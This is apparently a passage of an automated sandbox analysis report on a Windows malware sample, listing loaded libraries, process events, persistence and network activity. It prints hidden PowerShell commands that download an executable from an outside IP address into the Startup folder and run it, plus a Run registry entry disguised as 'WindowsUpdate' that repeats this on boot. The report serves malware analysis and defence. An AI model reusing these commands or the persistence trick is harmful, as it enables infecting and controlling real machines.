        Source: C:\Windows\explorer.exe  Section loaded: explorerframe.dll
        Source: C:\Windows\explorer.exe  Section loaded: twinui.pcshell.dll
        Source: C:\Windows\explorer.exe  Section loaded: wkscli.dll
        Source: C:\Windows\explorer.exe  Section loaded: wincorlib.dll
        Source: C:\Windows\explorer.exe  Section loaded: cdp.dll
        Source: C:\Windows\explorer.exe  Section loaded: dsreg.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.immersiveshell.serviceprovider.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.cloudstore.schema.shell.dll
        Source: C:\Windows\explorer.exe  Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.staterepositorycore.dll
        Source: C:\Windows\explorer.exe  Section loaded: mrmcorer.dll
        Source: C:\Windows\explorer.exe  Section loaded: languageoverlayutil.dll
        Source: C:\Windows\explorer.exe  Section loaded: bcp47mrm.dll
        Source: C:\Windows\explorer.exe  Section loaded: thumbcache.dll
        Source: C:\Windows\explorer.exe  Section loaded: edputil.dll
        Source: C:\Windows\explorer.exe  Section loaded: photometadatahandler.dll
        Source: C:\Windows\explorer.exe  Section loaded: ntshrui.dll
        Source: C:\Windows\explorer.exe  Section loaded: cscapi.dll
        Source: C:\Windows\explorer.exe  Section loaded: linkinfo.dll
        Source: C:\Windows\explorer.exe  Section loaded: ehstorshell.dll
        Source: C:\Windows\explorer.exe  Section loaded: cscui.dll
        Source: C:\Windows\explorer.exe  Section loaded: provsvc.dll
        Source: C:\Windows\explorer.exe  Section loaded: vcruntime140_1.dll
        Source: C:\Windows\explorer.exe  Section loaded: vcruntime140.dll
        Source: C:\Windows\explorer.exe  Section loaded: msvcp140.dll
        Source: C:\Windows\explorer.exe  Section loaded: twinui.appcore.dll
        Source: C:\Windows\explorer.exe  Section loaded: twinui.dll
        Source: C:\Windows\explorer.exe  Section loaded: pdh.dll
        Source: C:\Windows\explorer.exe  Section loaded: applicationframe.dll
        Source: C:\Windows\explorer.exe  Section loaded: stobject.dll
        Source: C:\Windows\explorer.exe  Section loaded: wmiclnt.dll
        Source: C:\Windows\explorer.exe  Section loaded: workfoldersshell.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.fileexplorer.common.dll
        Source: C:\Windows\explorer.exe  Section loaded: rmclient.dll
        Source: C:\Windows\explorer.exe  Section loaded: holographicextensions.dll
        Source: C:\Windows\explorer.exe  Section loaded: virtualmonitormanager.dll
        Source: C:\Windows\explorer.exe  Section loaded: resourcepolicyclient.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.ui.immersive.dll
        Source: C:\Windows\explorer.exe  Section loaded: abovelockapphost.dll
        Source: C:\Windows\explorer.exe  Section loaded: npsm.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.shell.bluelightreduction.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.web.dll
        Source: C:\Windows\explorer.exe  Section loaded: mscms.dll
        Source: C:\Windows\explorer.exe  Section loaded: coloradapterclient.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.internal.signals.dll
        Source: C:\Windows\explorer.exe  Section loaded: tdh.dll
        Source: C:\Windows\explorer.exe  Section loaded: cryptbase.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.staterepositorybroker.dll
        Source: C:\Windows\explorer.exe  Section loaded: mfplat.dll
        Source: C:\Windows\explorer.exe  Section loaded: rtworkq.dll
        Source: C:\Windows\explorer.exe  Section loaded: taskflowdataengine.dll
        Source: C:\Windows\explorer.exe  Section loaded: structuredquery.dll
        Source: C:\Windows\explorer.exe  Section loaded: actxprxy.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.security.authentication.web.core.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.data.activities.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.internal.ui.shell.windowtabmanager.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.system.launcher.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.shell.servicehostbuilder.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.devices.enumeration.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.globalization.dll
        Source: C:\Windows\explorer.exe  Section loaded: icu.dll
        Source: C:\Windows\explorer.exe  Section loaded: mswb7.dll
        Source: C:\Windows\explorer.exe  Section loaded: notificationcontrollerps.dll
        Source: C:\Windows\explorer.exe  Section loaded: devdispitemprovider.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.networking.connectivity.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.ui.core.textinput.dll
        Source: C:\Windows\explorer.exe  Section loaded: uianimation.dll
        Source: C:\Windows\explorer.exe  Section loaded: windowsudk.shellcommon.dll
        Source: C:\Windows\explorer.exe  Section loaded: dictationmanager.dll
        Source: C:\Windows\explorer.exe  Section loaded: npmproxy.dll
        Source: C:\Windows\explorer.exe  Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\explorer.exe  Section loaded: winhttp.dll
        Source: C:\Windows\explorer.exe  Section loaded: mswsock.dll
        Source: C:\Windows\explorer.exe  Section loaded: winnsi.dll
        Source: C:\Windows\explorer.exe  Section loaded: dpapi.dll
        Source: C:\Windows\explorer.exe  Section loaded: msasn1.dll
        Source: C:\Windows\explorer.exe  Section loaded: rsaenh.dll
        Source: C:\Windows\explorer.exe  Section loaded: dnsapi.dll
        Source: C:\Windows\explorer.exe  Section loaded: rasadhlp.dll
        Source: C:\Windows\explorer.exe  Section loaded: fwpuclnt.dll
        Source: C:\Windows\explorer.exe  Section loaded: schannel.dll
        Source: C:\Windows\explorer.exe  Section loaded: taskschd.dll
        Source: C:\Windows\explorer.exe  Section loaded: mskeyprotect.dll
        Source: C:\Windows\explorer.exe  Section loaded: ntasn1.dll
        Source: C:\Windows\explorer.exe  Section loaded: ncrypt.dll
        Source: C:\Windows\explorer.exe  Section loaded: ncryptsslp.dll
        Source: C:\Windows\explorer.exe  Section loaded: gpapi.dll
        Source: C:\Windows\explorer.exe  Section loaded: pcshellcommonproxystub.dll
        Source: C:\Windows\explorer.exe  Section loaded: execmodelproxy.dll
        Source: C:\Windows\explorer.exe  Section loaded: daxexec.dll
        Source: C:\Windows\explorer.exe  Section loaded: container.dll
        Source: C:\Windows\explorer.exe  Section loaded: shellcommoncommonproxystub.dll
        Source: C:\Windows\explorer.exe  Section loaded: cryptngc.dll
        Source: C:\Windows\explorer.exe  Section loaded: cflapi.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: qmgr.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: bitsperf.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: powrprof.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: xmllite.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: firewallapi.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: esent.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: umpdc.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: dnsapi.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: fwbase.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: wldp.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: ntmarta.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: profapi.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: flightsettings.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: policymanager.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: msvcp110_win.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: netprofm.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: npmproxy.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: bitsigd.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: upnp.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: ssdpapi.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: urlmon.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: iertutil.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: srvcli.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: cryptbase.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: wsmauto.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: miutils.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: wsmsvc.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: dsrole.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: pcwum.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: mi.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: userenv.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: gpapi.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: wkscli.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: sspicli.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: msv1_0.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: ntlmshared.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: cryptdll.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: webio.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: mswsock.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: winnsi.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: rmclient.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: usermgrcli.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: execmodelclient.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: propsys.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: coremessaging.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: execmodelproxy.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: vssapi.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: vsstrace.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: samcli.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: samlib.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: es.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: bitsproxy.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: schannel.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: ntasn1.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: ncrypt.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: msasn1.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: cryptsp.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: rsaenh.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: dpapi.dll
        Source: C:\Windows\System32\svchost.exe  Section loaded: mpr.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}\InProcServer32
        Source: Window Recorder  Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: 1ZXaFij.exe  Static PE information: Image base 0x140000000 > 0x60000000
        Source: 1ZXaFij.exe  Static file information: File size 1320960 > 1048576
        Source: 1ZXaFij.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: 2C:\Users\user\AppData\Local\Temp\vk4yczyv.pdbhPA source: powershell.exe, 00000011.00000002.1485108514.00000203A6605000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ;C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.pdb source: powershell.exe, 0000000B.00000002.1627613856.00000222B8D69000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 2C:\Users\user\AppData\Local\Temp\vk4yczyv.pdb source: powershell.exe, 00000011.00000002.1485108514.00000203A6605000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ;C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.pdbhPA source: powershell.exe, 0000000B.00000002.1627613856.00000222B8D69000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Windows\explorer.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vk4yczyv.cmdline"
        Source: C:\Users\user\Desktop\1ZXaFij.exe  Code function: 2_2_00000001400250E0 GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,WideCharToMultiByte,GetProcAddress,GetProcAddress,WideCharToMultiByte,GetModuleHandleW,LoadLibraryW,GetProcAddress,GetProcAddress, 2_2_00000001400250E0
        Source: 1ZXaFij.exe  Static PE information: section name: _RDATA
        Source: runps.exe.2.dr  Static PE information: section name: _RDATA
        Source: C:\Users\user\Desktop\1ZXaFij.exe  Code function: 2_2_0000000140025CEF push FF000003h; ret 2_2_0000000140025CF5

        Persistence and Installation Behavior

        Source: C:\Users\user\Desktop\1ZXaFij.exe Process created: reg.exe
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe Process created: reg.exe
        Source: C:\Users\user\Desktop\1ZXaFij.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vk4yczyv.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.dll

        Boot Survival

        Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe
        Source: C:\Users\user\Desktop\1ZXaFij.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe
        Source: C:\Users\user\Desktop\1ZXaFij.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe\:Zone.Identifier:$DATA
        Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate

        Hooking and other Techniques for Hiding and Protection

        Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 16000
        Source: unknown Network traffic detected: HTTP traffic on port 16000 -> 49700
        Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 16000
        Source: unknown Network traffic detected: HTTP traffic on port 16000 -> 49785
        Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 16000
        Source: unknown Network traffic detected: HTTP traffic on port 16000 -> 49837
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_000000014008C580 SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetDlgCtrlID,GetParent,GetWindowRect,GetPropW,ShowWindow,GetUpdateRect,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,SendMessageW,ShowWindow,SetFocus,InvalidateRect,MapWindowPoints,InvalidateRect,2_2_000000014008C580
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_00000001400A65B0 GetWindowThreadProcessId,GetForegroundWindow,IsIconic,ShowWindow,SetForegroundWindow,GetForegroundWindow,GetWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,SetForegroundWindow,GetForegroundWindow,GetWindow,SetForegroundWindow,GetForegroundWindow,GetWindow,AttachThreadInput,AttachThreadInput,BringWindowToTop,2_2_00000001400A65B0
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_00000001400435B0 IsZoomed,IsIconic,2_2_00000001400435B0
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_00000001400A2AC0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,2_2_00000001400A2AC0
        Source: C:\Users\user\Desktop\1ZXaFij.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
